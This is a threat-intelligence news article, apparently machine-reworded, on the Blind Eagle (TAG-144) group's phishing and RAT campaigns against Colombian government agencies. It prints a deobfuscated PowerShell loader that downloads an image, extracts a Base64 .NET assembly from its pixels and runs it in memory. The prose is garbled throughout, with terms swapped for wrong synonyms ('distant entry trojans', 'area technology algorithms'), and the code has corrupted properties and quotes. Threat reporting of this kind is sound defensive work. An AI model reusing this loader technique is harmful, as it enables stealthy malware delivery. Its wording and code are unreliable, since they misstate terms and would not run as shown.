Over the previous yr, a shadowy risk actor generally known as TAG-144—additionally tracked below aliases Blind Eagle and APT-C-36—has intensified operations in opposition to South American authorities establishments.
First noticed in 2018, this group has adopted an array of commodity distant entry trojans (RATs) resembling AsyncRAT, REMCOS RAT, and XWorm, usually delivered by means of extremely focused spearphishing campaigns masquerading as official judicial or tax notifications.
In mid-2025, Recorded Future analysts famous a big uptick in exercise, with 5 distinct clusters deploying new infrastructure and exploiting reliable web providers to stage malware payloads.
Preliminary entry sometimes leverages compromised or spoofed electronic mail accounts from native authorities businesses, luring customers into opening malicious paperwork or SVG attachments.
These attachments usually comprise embedded JavaScript that, when executed, retrieves a second-stage loader from providers like Paste.ee or Discord’s CDN.
Recorded Future researchers recognized quite a few compromised Colombian authorities electronic mail addresses used to ship misleading authorized summonses, illustrating the adversary’s capability to mix social engineering with technical subterfuge.
Phishing pages linked to Cluster 4 (Supply – Recordedfuture)
The affect of TAG-144’s campaigns has been most extreme in Colombia’s federal and municipal businesses, the place exfiltration of credentials and delicate information poses each espionage and monetary extortion dangers.
Regardless of sharing core ways throughout clusters—dynamic DNS domains, open-source RATs, and stolen crypters—the group’s evolving use of steganography and area technology algorithms (DGAs) marks a notable shift towards extra resilient operations.
Recorded Future analysts famous that this evolution not solely complicates conventional defenses but additionally underscores the blurred line between cybercrime and state-level espionage.
An infection Mechanism and Steganographic Payload Extraction
One among TAG-144’s most subtle methods includes embedding a Base64-encoded .NET meeting throughout the pixel information of a benign JPEG picture hosted on Archive[.]org.
Payload hosted on archive[.]org URL (Supply – Recordedfuture)
Upon execution of the preliminary PowerShell script, the loader scans for a predefined byte marker earlier than extracting and invoking the payload immediately in reminiscence, bypassing disk writes and evading antivirus detection.
For instance, the deobfuscated PowerShell section liable for this course of seems as:
$tormodont=”
$sclere = New-Object System.Internet.WebClient
$sclere.Headers.Add(‘Person-Agent’,’Mozilla/5.0′)
$sorority = $sclere.DownloadData($tormodont)
# Establish marker and extract embedded bytes
$splenoncus = $sorority[$markerIndex..($sorority.Length – 1)]
$stream = New-Object IO.MemoryStream
$stream.Write($splenoncus, 0, $splenoncus.Size)
$bitmap = [Drawing.Bitmap]::FromStream($stream)
# Reconstruct payload from pixel information
foreach ($y in 0..($bitmap.Top-1)) {
foreach ($x in 0..($bitmap.Width-1)) {
$colour = $bitmap.GetPixel($x,$y)
$bytesList.Add($colour.R); $bytesList.Add($colour.G); $bytesList.Add($colour.B)
}
}
$payloadBytes = [Convert]::FromBase64String($bytesList[4..($length+3)] -join ”)
[Reflection.Assembly]::Load($payloadBytes).EntryPoint.Invoke($null,$args)
This in-memory injection, coupled with dynamic area decision—usually leveraging providers like duckdns.org and noip.com—ensures that the RAT’s command-and-control infrastructure stays agile and tough to hint.
By avoiding conventional executable downloads and using steganography, TAG-144 demonstrates a complicated understanding of each detection evasion and asset staging, posing a persistent risk to authorities networks throughout the area.
Increase your SOC and assist your staff shield your enterprise with free top-notch risk intelligence: Request TI Lookup Premium Trial.
